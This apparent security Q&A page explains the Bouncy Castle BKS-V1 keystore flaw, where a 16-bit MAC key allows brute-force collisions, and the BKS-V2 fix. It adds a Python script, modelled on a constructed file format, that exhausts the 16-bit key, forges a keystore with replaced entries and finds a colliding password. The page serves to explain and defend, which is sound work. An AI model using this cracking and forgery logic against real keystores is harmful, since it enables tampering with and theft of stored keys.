Bouncy Castle is a collection of cryptographic APIs for Java and C#, but it was recently reported that some of the Bouncy Castle keystore files are vulnerable to hash collisions, which enable attackers to use brute force attacks to crack the cryptography behind C# and Java applications. How is this possible? What solutions has Bouncy Castle suggested?
The brute force attack is made possible by a design flaw in the first version of the Bouncy Castle keystore format (BKS-V1), the file in which Bouncy Castle stores encryption keys. The flaw lies in how the format determines the size of the message authentication code (MAC) key that protects the data inside the keystore: the key it derives is far too short to prevent a hash collision attack, in which an attacker finds a password whose derived key passes the keystore's integrity check.
BKS protects its contents with a hashed MAC (HMAC) built on SHA-1, a cryptographic hash function with a 160-bit output. RFC 7292, the PKCS #12 specification, requires the MAC key derived from the password to be the same size as the hash output, so an HMAC-SHA-1 key should be 160 bits long. BKS-V1 fails this requirement: the MAC key it derives is only 16 bits long instead of the required 160.
A 16-bit MAC key has only 65,536 possible values, so every BKS-V1 file, whatever its password, is protected by one of just 65,536 keys. An attacker therefore needs only a short password-cracking script: it tries candidate passwords, derives each one's 16-bit MAC key and checks whether the resulting HMAC matches the one stored in the file. The first candidate whose key collides with the real one passes the integrity check, which takes tens of thousands of guesses on average rather than the astronomically many a 160-bit key would demand. As computational power increases, such a search completes in ever fewer seconds.
A CERT Coordination Center blogger at Carnegie Mellon University demonstrated the attack with a brute force cracking tool built on Python's pyjks library and saved as a Python script (crackbks.py). Run against a BKS-V1 file, the script printed in the clear a password that passed the keystore's integrity check, confirming that the effective MAC key size of the Bouncy Castle keystore was only 16 bits.
Bouncy Castle's fix is a second version of the keystore format (BKS-V2), introduced in Bouncy Castle 1.47, in which the MAC key size was raised from 16 bits to 160 bits to protect the keystore from hash collision attacks. Bouncy Castle suggests using version 1.47 or newer and storing keys in the updated format. Note that upgrading the library does not by itself convert keystore files that were already written in the V1 format; those files remain vulnerable until they are re-saved in the new format.
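The script below is an added example written for this page; it is neither Bouncy Castle's code nor the CERT/CC crackbks.py script, and it does not need pyjks. It models the BKS MAC scheme described above: the PKCS #12 key derivation of RFC 7292 Appendix B with purpose ID 3 for MAC material, HMAC-SHA-1 over the entry data, and the MAC appended to the file. The V1 flaw is modelled as the store requesting a 20-"bit" key (the SHA-1 digest size in bytes passed where a bit count was expected), which the KDF turns into 2 bytes, while V2 requests the full 160 bits. The file layout (`_header`, opaque entry bytes, trailing HMAC), the function names, and the `SALT`, `ITERATIONS`, `PASSWORD` and `ENTRIES` values are all constructed for the example rather than taken from the real BKS encoding; the iteration count is deliberately tiny so the password search finishes in seconds. The example goes a step beyond the article: besides guessing a colliding password the way a cracking script does, it shows that the 16-bit key itself can be exhausted directly in well under a second, after which an attacker can rewrite the keystore's contents and re-MAC them so the store still verifies under the owner's password.

```python
"""Added example: a BKS-V1 store's 16-bit MAC key, recovered by brute force, versus BKS-V2's 160-bit key."""
import hashlib
import hmac
import struct

V_BYTES = 64       # SHA-1 input block size (v/8 in RFC 7292 Appendix B terms)
U_BYTES = 20       # SHA-1 output size (u/8)
MAC_MATERIAL = 3   # RFC 7292 Appendix B.3 purpose ID for MAC key material


def _extend(data: bytes, block: int) -> bytes:
    """Repeat data up to the next multiple of `block` bytes (RFC 7292 B.2 steps 2-3)."""
    if not data:
        return b""
    target = -(-len(data) // block) * block
    return (data * (-(-target // len(data))))[:target]


def pkcs12_kdf(password: str, salt: bytes, iterations: int, purpose: int, n_bytes: int) -> bytes:
    """PKCS #12 key derivation (RFC 7292 Appendix B.2) with SHA-1."""
    D = bytes([purpose]) * V_BYTES
    S = _extend(salt, V_BYTES)
    # PKCS #12 passwords are BMPStrings: UTF-16BE plus a two-byte terminator.
    P = _extend(password.encode("utf-16-be") + b"\x00\x00", V_BYTES)
    I = bytearray(S + P)
    out = b""
    while len(out) < n_bytes:
        A = hashlib.sha1(D + bytes(I)).digest()
        for _ in range(iterations - 1):
            A = hashlib.sha1(A).digest()
        out += A
        B = int.from_bytes(_extend(A, V_BYTES), "big")
        for j in range(0, len(I), V_BYTES):   # I_j = (I_j + B + 1) mod 2^v
            chunk = int.from_bytes(I[j:j + V_BYTES], "big")
            I[j:j + V_BYTES] = ((chunk + B + 1) % (1 << (8 * V_BYTES))).to_bytes(V_BYTES, "big")
    return out[:n_bytes]


def bks_mac_key(password: str, salt: bytes, iterations: int, version: int) -> bytes:
    """Derive the store's MAC key. The V1 flaw is modelled as asking for 20 'bits' (the digest
    size in bytes where bits were expected), i.e. 20 // 8 == 2 bytes; V2 asks for 160 bits."""
    key_bits = U_BYTES if version == 1 else U_BYTES * 8
    return pkcs12_kdf(password, salt, iterations, MAC_MATERIAL, key_bits // 8)


def _header(version: int, salt: bytes, iterations: int) -> bytes:
    return struct.pack(">II", version, len(salt)) + salt + struct.pack(">I", iterations)


def build_store(version: int, salt: bytes, iterations: int, entries: bytes, password: str) -> bytes:
    """Constructed layout: header | entries | HMAC-SHA1(mac_key, entries)."""
    key = bks_mac_key(password, salt, iterations, version)
    return _header(version, salt, iterations) + entries + hmac.new(key, entries, hashlib.sha1).digest()


def parse_store(blob: bytes):
    version, salt_len = struct.unpack_from(">II", blob, 0)
    salt = blob[8:8 + salt_len]
    (iterations,) = struct.unpack_from(">I", blob, 8 + salt_len)
    return version, salt, iterations, blob[12 + salt_len:-U_BYTES], blob[-U_BYTES:]


def verify_store(blob: bytes, password: str) -> bool:
    """The integrity check a loader performs: re-derive the key from the password, compare HMACs."""
    version, salt, iterations, entries, mac = parse_store(blob)
    key = bks_mac_key(password, salt, iterations, version)
    return hmac.compare_digest(hmac.new(key, entries, hashlib.sha1).digest(), mac)


def recover_v1_mac_key(blob: bytes):
    """V1 only: exhaust all 2**16 possible MAC keys directly; no password guessing needed."""
    _, _, _, entries, mac = parse_store(blob)
    for k in range(1 << 16):
        key = k.to_bytes(2, "big")
        if hmac.new(key, entries, hashlib.sha1).digest() == mac:
            return key
    return None


def forge_store(blob: bytes, new_entries: bytes) -> bytes:
    """Replace the entries and re-MAC them with the recovered key; the owner's password still verifies it."""
    version, salt, iterations, _, _ = parse_store(blob)
    key = recover_v1_mac_key(blob)
    return _header(version, salt, iterations) + new_entries + hmac.new(key, new_entries, hashlib.sha1).digest()


def find_colliding_password(blob: bytes, max_candidates: int = 1 << 20):
    """What a crackbks-style script does: guess passwords until one passes the MAC check. About one
    guess in 65,536 collides; a hit shows the guess derives the same 2-byte key, not that it is the owner's."""
    version, salt, iterations, _, _ = parse_store(blob)
    target = recover_v1_mac_key(blob)
    for n in range(max_candidates):
        guess = f"guess{n}"
        if bks_mac_key(guess, salt, iterations, version) == target:
            return guess
    return None


# Constructed inputs; a real BKS file uses a much larger iteration count (kept small so the search is quick).
SALT = bytes.fromhex("a1b2c3d4e5f60718")
ITERATIONS = 8
PASSWORD = "correct horse battery staple"
ENTRIES = b"alias=server-key;type=PKCS8;data=" + bytes(range(32))

if __name__ == "__main__":
    v1 = build_store(1, SALT, ITERATIONS, ENTRIES, PASSWORD)
    print("recovered 16-bit MAC key:", recover_v1_mac_key(v1).hex())
    print("forged store verifies under owner's password:", verify_store(forge_store(v1, b"attacker entries"), PASSWORD))
    print("colliding password:", find_colliding_password(v1))
```

Building the same store with `version=2` makes `recover_v1_mac_key` and `find_colliding_password` hopeless: the key space grows from 2^16 to 2^160, which is the whole point of the BKS-V2 change.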
Ask the expert:
Want to ask Judith Myerson a question about security? Submit your question now via email. (All questions are anonymous.)